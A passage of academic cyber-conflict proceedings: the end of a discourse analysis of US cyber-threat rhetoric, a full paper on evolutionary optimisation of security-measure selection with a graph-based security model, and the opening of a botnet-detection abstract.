warfare. The data of this study is exceptional in the sense that the propriety of the adversary is
aggressively demonized. Instead of describing the adversary as brutal monsters, the enemy identity is
compiled of descriptions of trecherous, skilled strangers, who act against the U.S. and affect the
everyday lives of its citizens. Sometimes making a difference between the descriptions of capacity and
propriety is difficult, as what is capacity for the enemy, may appear (and often is argumented) as
something immoral and cheap to 'us'.
Table 7: Propriety
disrupt telecommunications, electrical power,
material Judgment: social
energy pipelines, refineries, financial
sanction: propriety
networks, and other critical
infrastructures
(negative evaluation)
have connections to terrorist groups relational possessive Judgment: social
sanction: propriety
(negative evaluation)
are targeting our information systems and
material Judgment: social
infrastructure for exploitation and
sanction: propriety
potential disruption or destruction
(negative evaluation)
have other terrible things they can do to us relational possessive Judgment: social
sanction: propriety
(negative evaluation)
Here, the nature of war distinguishes the two: descriptions of military action are interpreted as
descriptions of capacity, and attacks against civilians or civilian infrastructures are interpreted as moral
judgment.
4.2.4 Nominal structures
The following examples illustrate how a nominal structure encapsulates the action and creates a 'brand'
or a concept. Below, the examples contain nominal structures used to refer to 'us' and 'them':
Table 8: Nominalizations 'us' vs. 'them'
'US' the adequacy of existing legal authorities Judgement: social esteem: capacity
the incapacity or destruction of such
systems and assets
Judgement: social esteem: capacity
the vulnerability of U.S. infrastructures Judgement: social esteem: capacity
Our lack of cyber security Judgement: social esteem: capacity
'TH China’s developments in these areas Judgement: social esteem: capacity
EM' the natural progression of those wishing to
harm U.S. security interests
Judgement: social sanction: propriety
violent extremism in support of a radically
different world-view
Judgement: social sanction: propriety
the emergence of powerful new state
competitors
Judgement: social esteem: capacity
The nominal structures referring to 'self' express lack of capacity, whereas the adversary is described as
threatening due to their capacity. These nominal structures summarize the essence of the data. They are
nominalized action descriptions that encapsulate the threat discourse. A quick look at them tells the
reader what the discourse focuses on: the development and progression of the adversary, and the
vulnerability of the U.S.
5. Conclusion
As stated earlier, cyber discourse is a synonym to threat discourse. As cyber is conceptualized through
threat descriptions, it is natural that it, as a domain, is caught in between the military and the civilian
170

Saara Jantunen and Aki-Mauri Huhtinen
world. The militarization of cyber discourse refects a certain political agenda. When the word "cyber" is
uttered, people immediately think of security. In this sense, the securitization has been successful. The
debates about China's cyber capability or WikiLeaks are narratives within this threat discourse.
According to the narratives researched in this article, the internet is not seen as a medium among others.
Instead, while recognizing its place as a medium for information sharing, it is seen as a battle space.
Even if the information, was available both online and through the press, only internet censorship is
called for.
The security (or threat) discourse about cyberspace stems from its unclear status. Either cyberspace is
recognized as a public information environment, or it is militarized into a dual-use weapon, which will
primarily function as a regulated medium and essentially as a battle space. The outcome of the power
struggle over internet authority will decide.
References
Beckford, M. (2010) 'Sarah Palin: hunt WikiLeaks founder like al-Qaeda and Taliban leaders', The Telegraph, 30 Nov
[Online] Available: http://www.telegraph.co.uk/news/worldnews/wikileaks/ 8171269/Sarah-Palin-hunt-WikiLeaksfounder-like-al-Qaeda-and-Taliban-leaders.html
[30 Jan 2011]
Bendrath, R. (2003) The American Cyber-Angst and the Real World - Any Link?. In Latham, R. (Ed.) Bombs and
Bandwidth: The emerging relationship between information technology and security, New York: The New Press.
Buzan, B., Waever, O. and De Wilde, J. (1998) Security: A new framework for analysis, London: Lynne Rienner
Publishers.
Center for Strategic and International Studies (CSIS)(2008) Securing Cyberspace for the 44th Presidency,
Washinton, DC.
China Economic and Security Review Commission (2008) 2008 Report to Congress. Washington, U.S. Government
printing Office.
Collins, N. (2010) 'WikiLeaks: guilty parties 'should face death penalty'', The Telegraph, 1 Dec
[Online] Available: http://www.telegraph.co.uk/news/worldnews/wikileaks/8172916/ WikiLeaks-guilty-parties-shouldface-death-penalty.html
[30 Jan 2011]
Council on Foreign Relations (2010) 'Clinton's Speech on Internet Freedom, January 2010' [Online] Available:
http://www.cfr.org/publication/21253/clintons_speech_on_internet_freedom_january_ 2010.html [30 Jan 2011]
Halliday, M.A.K. (2004) An introduction to functional grammar, 3rd edition. Revised by M.I.M. Mathiessen, London:
Arnold.
James, F. (2010) 'WikiLeaks Is A Terror Outfit: Rep. Peter King', NPR, 29 Nov [Online] Available:
http://www.npr.org/blogs/itsallpolitics/2010/11/29/131664547/wikileaks-is-a-terror-outfit-rep-peter-king
Kuparinen, V-P. (2009) Interview with the director, 25 August 2009. National emergency supply agency, Helsinki:
Author.
Lukin, A. (2005) 'Information warfare: the grammar of talking war', Social Alternatives, Vol 24 No. 1, First Quarter, pp.
5-10.
Lewis, J.A. (2007) 'There’s No Such Thing As Cyberterror', Atlantic Community, 25 July [Online] Available:
http://www.atlanticcommunity.org/index/Open_Think_ Tank
_Article/There%27s_No_Such_Thing_As_Cyberterror [30 Jan 2011]
Martin, J.R. and White, P.R.R. (2005) The language of evaluation: Appraisal in English, New York: Palgrave
Macmillan.
Pillifant, R. (2010) 'Peter King On Why Wikileaks Should Be Declared A Terrorist Organization [Video]', The New
York Observer, 29 Nov [Online] Available: http://www.observer.com/2010/ politics/peter-king-why-wikileaksterrorist-organization
[30 Jan 2011]
Scarborough, R. (2010) 'Military ordered to stay off WikiLeaks', 6 Aug [Online] Available:
http://www.washingtontimes.com/news/2010/aug/6/pentagon-bars-staff-from-visiting-wikileaks-site/
Schmitt, E. (2010) 'In Disclosing Secret Documents, WikiLeaks Seeks ‘Transparency’' The New York Times, July 25
[Online] Available: http://www.nytimes.com/2010/07/26/world/ 26wiki.html [30 Jan 2011]
The Cybersecurity Act of 2009 (S 773 IS) (2009) Act. [Online] Available: http://frwebgate.access.gpo.gov/cgibin/getdoc.cgi?dbname=111_cong_bills&docid=f:s773rs.txt.pdf
[30 Jan 2011]
US Department of Defense (2010) 'DOD News Briefing with Secretary Gates and Adm. Mullen from the Pentagon'
[Online] Available: http://www.defense.gov/transcripts/transcript.aspx?transcriptid=4728 [30 Jan 2011]
White House (2009) Cyberspace Policy Review: Assuring a Trusted and Resilient Information and Comunications
Infrastructure. [Online] Available: http://www.whitehouse.gov/assets/documents/
Cyberspace_Policy_Review_final.pdf [30 Jan 2011]
Wikirebels (2010) Documentary, Swedish Television. [Online] Available: http://www.viddler.com/
explore/WikiRebels/videos/1/ [30 Jan 2011]
Yould, R. (2003) 'Beyond the American Fortress: Understanding Homeland Security in the Information Age'. In
Latham, R. (Ed.) Bombs and Bandwidth: The emerging relationship between information technology and
security, New York, The New Press.
171

Evolutionary Algorithms for Optimal Selection of Security
Measures
Jüri Kivimaa 1 and Toomas Kirt 2
1
Cooperative Cyber Defence Centre of Excellence, Tallinn, Estonia
2
University of Tartu, Tallinn, Estonia,
Jyri.Kivimaa@mil.ee
Toomas.Kirt@ut.ee
Abstract: A very important issue in IT Security or Cyber Security management is to provide cost-efficient security
measures to achieve needed or required security goals (mainly CIA - Confidentiality, Integrity, Availability levels). For
providing an optimal solution an optimization task with two goals have to be solved – to minimize needed resources
and to maximize achievable security. The computational complexity of the optimization task is very high. In previous
work a matrix based security model and an optimization framework based on the Pareto optimality and the discrete
dynamic programming method has been used. But that solution has a quite important imperfection – there was
required independence between security activity areas. That is not appropriate for IT security, as this solution does
not follow the quite important principle in IT security – security is like a chain that is only as strong as the weakest link
of layered security or defence in depth. The evolutionary optimization, as an alternative optimization tool, removed
the independence restriction of the matrix based security model and the dynamic optimization method, but the first
implementation of it was slightly slower than the other methods. For improving the performance of the evolutionary
optimization we have performed a meta-level optimization of parameters of the algorithm and as a result the speed of
optimization is comparable to other optimization techniques. As the evolutionary optimization is independent for all
possible budget levels it lead to possibility to use a graph based security model. The graph based security model is a
new and dynamical framework for security management. This paper presents how implementation of an evolutionary
optimization technique removed the restrictions of independence of security measures and lead to implementation of
an efficient graph based security model.
Keywords: graded security model, information security metrics, evolutionary optimization
1. Introduction
One of the most important tasks for IT security management is the optimal use of existing resources and
the main idea for our R&D work is to propose to IT Security decision-makers a Graded Security Model
(GSM) and a decision support system for this. In papers (Kivimaa, 2009; Kivimaa, Ojamaa, and Tyugu,
2009; Ojamaa, Tyugu, and Kivimaa, 2008) it was shown how to use the GSM for finding optimal solutions
based on the Pareto-optimal situation analysis, the discrete dynamic programming method for
optimization calculations and weighted average confidence of security activities areas was used as
optimization criteria. As it turned out the computational complexity of the optimization task is very high.
For example, if to consider that an IT security model has 30-40 activity areas and in each of them has 4
possible implementation levels then there are 4 30 ÷ 4 40 possible solutions within to select an optimum.
The Brute Force optimization technique requires a couple of years to calculate even one possible budget
point.
In (Kivimaa 2009) was also brought up some weaknesses caused from the dynamic programming
method. Namely, using dynamic programming in optimization of security activities areas must not be
dependent from each other and their levels must be additive. To achieve better solutions in the future it is
reasonable to continue GSM development – mainly to collect expert knowledge for the up-to-date model
– that is, up-to-date information about security goals, their levels and information security activities areas
and their realization levels dependency matrix and up-to-date theirs levels realization costs and
effectiveness’s. And, as independent IT security activities is source for quite serious problems, to cover IT
security problems in more detail and correct way we have to accept dependencies between lines in
Dependencies Matrix - to describe these dependencies in addition to Dependencies Matrix use (find or
work out) the IT security or IT security activities areas Dependencies Graph.
Because the independence of security activity areas was required by the Dynamic Programming (DP)
method our aim was to apply an alternative method for optimization and we decided to use an
evolutionary algorithm as a universal method for complex optimization in many fields. The evolutionary
algorithm starts each optimization process from the beginning and therefore it does not have any
problems related to independence and additivity.
172

Jüri Kivimaa and Toomas Kirt
As the evolutionary optimization is independent for all possible or interesting budget levels and intervals it
leads to possibility to use a graph based security model. The graph based security model is a new and
dynamical framework for security management. The new graph model gives us possibility to calculate the
most needed/wanted reliability for a specific IT security System (also often named as Confidence) and
Security Efficiency (SE), which value can be expressed as SE = Information Value / Real Losses = 1 / (1-
Confidence).
Our main ideas are:
Use metrics to determine information systems security requirements - i.e. use high level risk analysis
(levels of security goals) as IT security metrics;
Secure IT systems and their information in an economically rational/optimal manner – i.e. accordingly
to data security requirements;
The important issue in defining and implementing security measures is the economic efficiency of
security activities, that is: we want to get the best results for our money - to minimize the costs and to
maximize the integral security confidence.
2. Graded security model
The graded security model has been in use for a long time in the high-risk areas like nuclear waste
depositories, radiation control etc. (DOE 1999, see also Kivimaa 2009 for details). In IT security is also
reasonable to apply a methodology that allows one to select rational security measures based on graded
security, and taking into account the available resources, instead of using only hard security constraints
prescribed by standards that usually do not include economic parameters - the cost and efficiency of
implemented security measures.
The ideas of graded security were used on the US Department of Energy security model (DOE 1999) and
on its updated NISPOM version (NISPOM 2006).
In the NISPOM model 14 graded security activities areas are defined and 15÷20 left only on base levels.
As the NISPOM model is meant for protection of critical information infrastructure it is obvious that these
base levels are the highest possible implementation levels. But for institutions having less critical IT
security these NISPOM areas on the base level have different possible implementation levels too – i.e.
theoretically they are graded too (look Figure 1).
But the matrix based model has one quite serious limitation – in table we have no good possibilities to
consider dependencies between table columns and rows – that is, there is not any good way to describe
really existing additive and dependent nature in IT security goals and activities areas (Kivimaa 2009).
2.1 Graph based security model
It is possible to write dependencies between the matrix rows as functions into cells, but much more
understandable and comprehensive results (understandable in one look) if we represent collection of
rules as a graph structure. At the same we are no more limited to weighted average only, with graph we
get possibility to calculate for decision makers some very interesting and important parameters about
achieved security level - confidence and security efficiency (in more details look 2.2).
The graded IT security graph is based on the main ideas from the “(People - Process – Technology) and
Organization” Business Model for IT security (ISACA 2009). Based on this and the IT security
Dependency Matrix (Figure 1), containing security areas and their levels, a Bank IT security Graph
(Figure 2) is formed.
There are two important principles in IT security that are based on the graph and are much more visible
and understandable:
A chain is only as strong as the weakest link – in some IT security areas we must have valid reliability
level otherwise overall reliability of security system will be 0 (look Figure 2 – mainly people, SW,
Power, HW, LAN and AntiMalware) - so called must-be elements in the graph (look Figure 2).
173

Jüri Kivimaa and Toomas Kirt
Layered security / defence in depth – we have a lot security activities areas that are parallel to so
called must-be areas that make possible to raise reliability of these must-be areas (Figure 2).
Figure 1: IT security dependency matrix for a bank
174

Figure 2: IT security dependency graph for a bank
Jüri Kivimaa and Toomas Kirt
175

2.2 Model optimization
Jüri Kivimaa and Toomas Kirt
We are building a model that binds security measures (grouped by security activities areas) with costs
and confidences of achieved the security goals and their levels. We introduce a fitness function that
presents by one numeric value the integral confidence of achieved security level. This allows us to
formulate a problem of selecting security measures as an optimization problem in precise terms.
However, we still have two goals: to minimize the costs and to maximize the integral security confidence.
This problem will be solved by means of building a Pareto optimality trade-off curve that explicitly shows
the relation between used resources and security confidence (Figure 3).
Knowing the available resources, we can find the best possible security level that can be achieved with
the available resources and find the security measures to be taken. From the other side – if the required
security level is given we can find the resources needed and the measures that have to be taken. This
requires solving an optimization problem for each value of resources.
Figure 3: Search of optimal security along resource dimension – Pareto optimality trade-off curve
To calculate Pareto set/curve for GSM we have used/tested three possible optimization techniques:
Brute Force
Dynamic Programming
Evolutionary Algorithms
And all approaches have their pluses and minuses. The first area for problems is calculations time
needed for optimization (in more detail look 2.2.1).
Although the Dynamic Programming method is very good way to become free from calculation time
problems (optimizations time for medium consumer desktop PC is excellent – minute or two), the DP has
quite serious other limitations:
Security activities areas/security measures groups must be not dependent from each other
Their levels/security measures to realize their levels must be additive
Practically impossible to specify alternative and very close optimization results.
The best capabilities has the evolutionary algorithm – it has no problems with dependency/independency,
additive/non-additive and matrix/graph, it finds all alternative or very close results for all possible and
176

Jüri Kivimaa and Toomas Kirt
interesting cost-levels and the main advantage is that evolutionary optimization starts optimization for all
possible and/or interesting budget points from the very beginning. The only possible problem is related to
calculations time - the parameters for optimization have to be optimal (in more detail look 2.2.1 and 3.1).
2.2.1 The computational complexity of the optimization task
For comparing three optimization methods we will find calculation times for all three optimization methods
for small and medium not IT-critical enterprises (~10 security activities areas) and for bigger IT-critical
enterprises (for the Bank ~30 security activities areas):
3. Brute force
We have to calculate and compare qk n possible variations (q is the number of possible values of security
budget levels, n is the number of security measure groups or security activities areas, k is the value of
possible implementation levels for security measure group/security activities area, quite prevalently used
3 or 4):
For 10 security activities areas is required testing of 100*4 10 =~100*10 6 variations,
For 30 security activities areas is required testing of 100*4 30 =~100*10 18 variations,
In more detailed IT security handling (n) optimization time increase is exponential and if to consider that
medium consumer PC can perform optimization for 10 security activities areas (for small and not ITcritical
institution, ~100*10 6 calculations and comparisons) in a minute then Brute Force optimization for
bigger and IT-critical institution will take hundreds years.
4. Dynamic programming
We have to calculate and compare q 2 kn possible variants (q is the number of possible values of security
budget levels, n is the number of security measure groups or security activities areas, k is the value of
possible implementation levels for security measure group/security activities area, quite prevalently used
3 or 4):
For 10 security activities areas is required testing of 100*100*4*10=0,4*10 6 variations,
For 30 security activities areas is required testing of 100*100*4*30=1.2*10 6 variations.
In more detailed IT security handling optimization time increase is linear and consequenly n rise even the
magnitude does not lead to any calculations time problems.
5. Evolutional
The number of variants required to calculate/compare by this algorithm is:
q * Population size * Number of Generations * Number of Repeats.
And as based on results of meta-level optimization (see 3.1.2) ‘Population size’ = n*3, ‘Number of
Generations’ = n*4 and ‘Number of Repeats’ = 3 (q is the number of possible values of security budget
levels, n is the number of security measure groups or security activities areas) and optimal number of
variants to calculate and compare is 36*q*n 2 :
For 10 security activities areas is required testing of 36*100*10 2 =0,36*10 6 variations,
For 30 security activities areas is required testing of 36*100*40 2 =3.24*10 6 variations.
For more detailed IT security handling optimization time increase is quadratic and consequently is quite
important to use optimal parameters in optimization.
In conclusion:
Optimization time is critical,
The Brute Force optimization method is inappropriate for more complex cases,
The Dynamic Programming based optimization method has not any problems related to calculations
time,
For the Evolutionary method it is important to use the optimal optimization parameters.
177

Jüri Kivimaa and Toomas Kirt
5.1.1 GS graph-based model reliability/confidence calculations
The main idea for optimization is to achieve graph’s maximal Confidence with minimal Costs – i.e. Pareto
set or Pareto frontier for GSM Costs or Confidence.
5.1.2 Reliability (alias confidence) of series systems of "n" identical and independent components
A series system is a configuration such that, if any one of the system components fails, the entire system
fails. Conceptually, a series system is one that is as weak as its weakest link. A graphical description of a
series system is shown in Figure 4.
Figure 4: Representation of a series system of "n" components
Engineers are trained to work with system reliability [RS] concepts using "blocks" for each system
element, each block having its own reliability for a given mission time T:
RS = R1 × R2 × ... Rn (if the component reliabilities differ, or)
RS = [Ri ] n (if all i = 1, ... , n components are identical)
A set of n blocks connected in series can be replaced with a single block with the Reliability/Confidence
RS/CS.
5.1.3 Reliability (alias confidence) of parallel systems
A parallel system is a configuration such that, as long as not all of the system components fail, the entire
system works. Conceptually, in a parallel configuration the total system reliability is higher than the
reliability of any single system component. A graphical description of a parallel system of "n" components
is shown in Figure 5.
Figure 5: Representation of a parallel system of "n" components
Reliability engineers are trained to work with parallel systems using block concepts:
RS = 1 - (1 - Ri ) = 1- (1 - R1) × (1 - R2) ×... (1 - Rn); if the component reliabilities differ, or
RS = 1 - [1 - R] n ; if all "n" components are identical: [Ri = R; i = 1, ..., n].
A set of n blocks connected in parallel can be replaced with a single block with the reliability/Confidence
RS/CS.
By recursively replacing the series and parallel subsystems by single equivalent elements we can obtain
the Reliability/Confidence RS/CS for entire graph/system.
178

Jüri Kivimaa and Toomas Kirt
5.1.4 Specifics for GS graph-based model confidence calculations.
In GSM we have the only so called must-be serial box’s and logic „if any one of the system components
fails, the entire system fails“ is exact and perfect.
But with parallel components is situation a bit more complicated. For full redundant security activities (for
example, HW and Redundant HW) is principle „as long as not all of the system components fail, the
entire system works exact, but if we have in parallel must-be security activity area with activities areas
trying to improve the must-be activity Confidence (as example HW and Logging/Monitoring) then we have
not fully redundant situation – we must bring in Redundancy Coefficient RC.
Practically RC = 1 ÷ 0,1 - for full redundancy RC = 1 and parallel to must-be activity with less Redundancy
than 0,1 is pointless.
If for full redundancy C = 1 - (1 -C1_mb)*(1 - C2) = C1_mb + C2 ( 1 - C1_mb )
then bringing in Redundancy Coefficient RC for Not-Full-Redundant parallel situations
C = 1 - (1 -C1_mb)*(1 - RC* C2) or C = C1_mb + RC* C2*( 1 - C1_mb )
By recursively replacing the series (must-be) and parallel subsystems by single equivalent elements we
can obtain the Reliability/Confidence RS/CS for entire graph/system and the new graph model gives us
possibility to calculate for IT managers/decision makers the most needed/wanted reliability for a specific
IT security System (also often named as Confidence) and Security Efficiency (SE), which value can be
expressed as
SE = IT-risks / Real Losses = 1 / (1- CS).
For example, on Figure 6 SE is produced as a function from IT security activities and measures of costs.
Figure 6: SE = f (costs)
6. Evolutionary algorithms
Evolutionary algorithms are based on a Darwinian natural selection process and form a class of
population-based stochastic search algorithms (Dracopoulos, 2008; Eiben & Smith, 2003; Holland, 1975).
The view, that random variation provides the mechanism for discovering new solutions (Michalewicz &
179

Jüri Kivimaa and Toomas Kirt
Fogel, 2004), was inspired by the process of natural evolution. The idea of using Darwinian principles of
evolution to solve some combinatorial optimization problems arose with the invention of electronic
computers. Now there are a wide variety of approaches that can be described as belonging to the field of
evolutionary computing. The algorithms used in the field are termed as evolutionary algorithms
(Dracopoulos, 2008).
The most important characteristics of evolutionary algorithms are as follows:
Each candidate solution to the optimization problem is represented as an individual. The set of
individuals are named as a population.
The quality of a candidate solution is measured by a fitness function. Fitter solutions have a higher
probability to survive and to contribute their characteristics to offspring (next generation).
Variation operators (e.g., crossover, mutations) are applied to the individuals that modify the
population of solutions dynamically.
The average fitness is improved over time as a selection mechanism is applied and the fittest
individuals are selected for the next generation (survival of the fittest).
The basis of an evolutionary algorithm is simple. First, a population of initial candidate solutions has to be
generated randomly. Thereafter iteratively a number of variation generation operators are applied and for
the new generations the fittest individuals are selected.
6.1 Meta-level optimization of evolutionary algorithms
The aim of this work is to optimize the parameters of an evolutionary algorithm. As the optimization
process is based on randomness it makes the speed of the problem solving task rather variable. There
are no hard and fast rules for choosing appropriate values for the parameters (Cicirello & Smith, 2000).
The first scientist, who put a considerable effort into finding parameter values, was De Jong (1975). He
tested different values experimentally and concluded that the following parameters give reasonable
performance for his test functions: population size 50, crossover 0.6 and mutation rate 0.001 (see also for
details Eiben, Hinterding, & Michalewicz, 1999). But those values are suitable for the problem that he had
at hand. It has been shown that it is not possible to find parameter values which are optimal for all
problem domains (Wolpert, & Macready, 1997) therefore each problem need its own approach and
different set of parameters.
A widely practised approach to identify a good set of parameters for a particular class of problem is
through experimentations and using the trial-and-error approach. As the evolutionary approach is mostly
based on the trial-and-error to move through the search space therefore it would be reasonable to use
the evolutionary algorithm itself to optimize its parameters and such approach is called as a meta-level
optimization (Cicirello & Smith, 2000). The main weakness of this approach is that it is computationally
expensive and takes a lot of time.
There are two ways to improve the performance of the evolutionary algorithm. The strategy can either be
static or adaptive (Aine, Kumar, & Chakrabarti, 2006). For static framework, the parameter values are
decided at the start of the algorithm and the decision is not revised during runtime. The static model
works well when there is little or no uncertainty about the progress of the algorithm. For algorithms where
the progress is not predictable and different parameter settings are suitable at different stages, a dynamic
monitoring based strategy is preferred. In the dynamic case, the control decision is updated during
runtime by monitoring the progress of the algorithm for a particular run. As the IT security costs
optimization task is rather stable and does not include many uncertainties, we decided to find out a static
set of parameters rather than develop a dynamic framework for parameter changes.
6.1.1 Meta-level optimization set-up
An individual in the optimization task was represented as a vector consisting of 10 elements. The
elements represented the adjustable set of parameters: Repeat – how many times to repeat optimization
process, Population – population size, Tournament – tournament size (number of individuals in a subset),
Generations – a predefined number of generations, Crossover – probability of applying crossover
operator (value 0.49 means that in 49% cases the crossover occurs), Mutate – probability of mutation,
Swap – probability of swapping, Inversion – probability of inversion, Insertion – probability of insertion,
180

Jüri Kivimaa and Toomas Kirt
and Displacement – probability of displacement. During the meta-level optimization process a candidate
solution was optimized based on these parameters.
An important question was how to measure the fitness of the meta-level evolutionary optimization. We
had two optimization goals, first, to find maximum level of confidence and second, to find it as fast as
possible. Therefore we had to combine the measure of confidence and time. As each optimization was
repeated r times the value of meta-level fitness function F was calculated as average of fitness of original
task minus time:
F = sum(ci – ti) / r
where ci is the confidence level and ti is the calculation time in seconds of i-th experiment (see curve in
Figure 7).
6.1.2 Results of meta-level optimization
We performed experiments with the data (Figure 1) consisting of 33 security activity areas. From the
original data we formed 6 sets consisting of 13, 17, 21, 25, 29 and 33 areas. The parameters for metalevel
optimizer were as follows: population size 75, tournament size 15 and the number of generations
75, crossover rate 0.9 and mutation rate 0.7.
The optimization process took almost two and half days. As we could see on the detailed graph (Figure
7) the fine tuning of the meta-level optimization took some time to find the optimal level.
Figure 7: The fitness value of the meta-level optimization task (upper part of the fitness curve)
Average results of the optimization process are given in Table 1.
Table 1: Average values of parameters as a result of meta-level optimization
No Pop Tournament Generations Crossover Mutation Swap Inversion Insertion Displacement
13 28.86 41.43 42.86 0.82 0.7 0.58 0.19 0.15 0.15
17 35.57 69.14 67.43 0.85 0.89 0.63 0.14 0.16 0.12
21 46.57 40.71 70.71 0.8 0.88 0.53 0.1 0.13 0.12
25 43.43 31.86 95.86 0.85 0.77 0.61 0.08 0.13 0.15
29 48.86 65.29 92.43 0.8 0.89 0.74 0.07 0.1 0.16
33 61.43 37.71 96.43 0.91 0.74 0.72 0.13 0.06 0.13
181

Jüri Kivimaa and Toomas Kirt
As we calculated correlation coefficients (Table 2) we could see that there is strong linear correlation
between the number of security activity areas (the size of task) and the number of individuals in a
population (r=0,95) and the number of generations (r=0.92). There is also positive correlation between
the size of task and crossover probability (0.45). With the most other probability values the correlation is
negative.
Table 2: Correlation coefficients of all 35 selected results
No Pop. Tourn. Gen. Crossover Mutate Swap Inversion Insertion Displace.
No 1 0.95 -0.13 0.92 0.45 0.06 0.73 -0.64 -0.92 0.16
Population 0.95 1 -0.21 0.82 0.48 0.08 0.57 -0.53 -0.93 -0.12
Tournament -0.13 -0.21 1 -0.1 -0.29 0.7 0.37 -0.06 0.24 -0.04
Generations 0.92 0.82 -0.1 1 0.4 0.18 0.62 -0.8 -0.71 0.16
Crossover 0.45 0.48 -0.29 0.4 1 -0.47 0.4 0.2 -0.51 -0.28
Mutate 0.06 0.08 0.7 0.18 -0.47 1 0.05 -0.56 0.18 -0.3
Swap 0.73 0.57 0.37 0.62 0.4 0.05 1 -0.29 -0.7 0.38
Inversion -0.64 -0.53 -0.06 -0.8 0.2 -0.56 -0.29 1 0.33 -0.21
Insertion -0.92 -0.93 0.24 -0.71 -0.51 0.18 -0.7 0.33 1 -0.12
Displacement 0.16 -0.12 -0.04 0.16 -0.28 -0.3 0.38 -0.21 -0.12 1
In Figure 8 we could see that the probabilistic values of variation operators (Crossover, Mutation and
Swap) had quite high values and the others value was rather small and even diminished as the problem
grows. Probably their computational cost was relatively high comparing the gain of fitness.
Figure 8: Change of probability of variation operators
In Figure 9 we could see that there is a clear linear relation between the problem size and the population
size and the number of generations.
182

Jüri Kivimaa and Toomas Kirt
Figure 9: Distribution of population and generation values and their mean value (line)
Based on the measurements we were able to generate formulas to specify the parameters of
evolutionary optimizer. As we added to the mean value and the standard deviation μ + σ to get rough
estimate for the population related values (e.g., based on the mean value of Generations / Number
security activity areas μ = 3.429, standard deviation σ = 0.5688, we can calculate the coefficient 3.429 +
0.5688 ≈ 4). The results could be as follows:
repeat 3
population size N * 3
tournament size 50
generations N * 4
where N is the number of security activity areas as the number of security levels is 4.
As there was a tendency to move closer to certain values we decided to use in further optimizations the
following parameter set for variation operators:
crossover rate 0.9
mutation rate 0.8
swap rate 0.6
inversion rate 0.1
insertion rate 0.07
displacement rate 0.11
As we could predict optimal population related parameters and also identified optimal values for
probability operator values we could estimate optimization time and to perform optimization tasks much
faster.
7. Conclusions
We have performed an analysis to identify linear coefficients for estimating the parameter values of the
evolutionary algorithm. As a result we have found a way to calculate the value for population size and the
number generations that are based on the problem size and also identified optimal parameter set for
variation operators. It makes the use of evolutionary algorithm more efficient and enables us to increase
the optimization speed. As there are certain restrictions related to the other optimization techniques the
183

Jüri Kivimaa and Toomas Kirt
evolutionary approach also enables us to enhance the IT security methodology and a new graph-based
model is proposed.
But wider application of the graph-based model will depend on the availability of expert knowledge or
statistics that binds costs and security confidence values with the security measures. This expert data will
depend on the type of the infrastructure where information must be protected - different for different
countries and economy areas. The only realistic solution is an expert system that can be adjusted by
experts to suit concrete situations. Therefore some further work is needed to enhance the model and
provide appropriate expert knowledge to turn the model more accurate.
References
Aine, S., Kumar, R., and Chakrabarti, P.P. (2006) “Adaptive Parameter Control of Evolutionary Algorithms Under
Time Constraints”, in A., Tiwari, J. Knowles, E. Avineri, K., Dahal, and R., Roy (Eds.), Applications of Soft
Computing, Berlin, Springer, pp. 373–382.
Cicirello, V. A., and Smith, S. F. (2000) “Modeling GA performance for control parameter optimization”, in D., Whitley,
D., Goldberg, E., Cant-Paz, L., Spector, I., Parmee, and H., Beyer (Eds.), GECCO-2000: Proceedings of the
Genetic and Evolutionary Computation Conference, Las Vegas, NV, pp. 235–242.
De Jong, K. (1975) “The analysis of the behavior of a class of genetic adaptive systems”, Ph.D. dissertation,
Department Computer Science, University of Michigan, Ann Arbor, MI.
DOE (1999) Classified Information Systems Security Manual. Retrieved February 1, 2010, from
https://www.directives.doe.gov/directives/archive-directives/471.2-DManual-2/at_download/file.
Dracopoulos, D. C. (2008) “Evolutionary Learning”, in B. Wah (Ed.), Wiley Encyclopedia of Computer Science and
Engineering. New York, John Wiley and Sons.
Eiben, A. E. , Hinterding, R., and Michalewicz, Z. (1999) “Parameter control in evolutionary algorithms”, IEEE
Transactions on Evolutionary Computation, Vol 3, No. 2, pp. 124–141.
Eiben, A. E., and Smith, J. E. (2003) Introduction to Evolutionary Computing, Berlin, Springer.
Holland, J. H. (1975) Adaptation in Natural and Artificial Systems: An Introductory Analysis with Applications to
Biology, Control, and Artificial Intelligence, Cambridge, MA, MIT Press.
ISACA (2009) “An Introduction to the Business Model for Information Security,” ISACA.
Kirt, T., and Kivimaa, J. (2010) “Optimizing IT security costs by evolutionary algorithms”, in C. Czosseck, and K.
Podins, (Eds.), Conference on Cyber Conflict Proceedings 2010, Tallinn, Estonia, Cooperative Cyber Defence
Centre of Excellence Publications, pp. 145–160.
Kivimaa, J. (2009) “Applying a costs optimizing model for IT security”, in H. Santos (Ed.), Proceedings of the 8th
European Conference on Information Warfare and Security, Reading, UK, Academic Publishing Limited, pp.
142–153.
Kivimaa, J. Ojamaa, A. and Tyugu, E. (2009) “Graded security expert system”, in CRITIS 2008: Third International
Workshop on Critical Information Infrastructure Security, Rome, Springer.
Michalewicz, Z., and Fogel, D. B. (2004) How To Solve It: Modern Heuristics, Berlin, Springer.
NISPOM (2006) “National Industrial Security Program Operating Manual,” U.S. Department of Defense..
Ojamaa, A., Tyugu, E., and Kivimaa, J. (2008) “Pareto-optimal situation analysis for selection of security measures”,
in Military Communications Conference MILCOM 2008: Unclassified Proceedings, Piscataway, NJ, IEEE, pp.
3224–3230.
Wolpert, D., and Macready, W. G. (1997) “No free lunch theorems for optimization”, IEEE Transactions on
Evolutionary Computation, Vol 1, No. 1, pp. 67–82.
184

Botnet Detection: A Numerical and Heuristic Analysis
Luís Mendonça and Henrique Santos
Universidade do Minho, Braga, Portugal
mendonca.luis@gmail.com
hsantos@dsi.uminho.pt
Abstract: Internet cyber criminality has changed its ways since the old days where attacks were greatly motivated by
recognition and glory. A new era of cyber criminals are on the move. Real armies of robots (bots) swarm the internet
perpetrating precise, objective and coordinated attacks on individuals and organizations. Many of these bots are now
coordinated by real cybercrime organizations in an almost open-source driven development, which results in the
proliferation of many bot variants with refined capabilities and increased detection complexity. Economical and
reputation damages are difficult to quantify but the scale is widening. It’s up to one’s own imagination to figure out
how much was lost in April of 2007 when Estonia suffered the well known distributed attack on its internet countrywide
infrastructure. Among the techniques available to mitigate this threat, botnet detection emerges as a relevant
solution. This technology has also evolved in recent years but it is still far from a definitive solution. New techniques,
constantly appearing, in areas such as host infection, deployment, maintenance, control and dissimulation of bots are
constantly changing the detection vectors thought and developed. In that way, research and implementation of
anomaly-based botnet detection systems is fundamental to pinpoint and track the continuously changing botnets and
clones, which are impossible to identify by simple signature-based systems. This paper presents the studies and
tests made to define an effective set of traffic parameters capable of modeling both normal and abnormal activity of
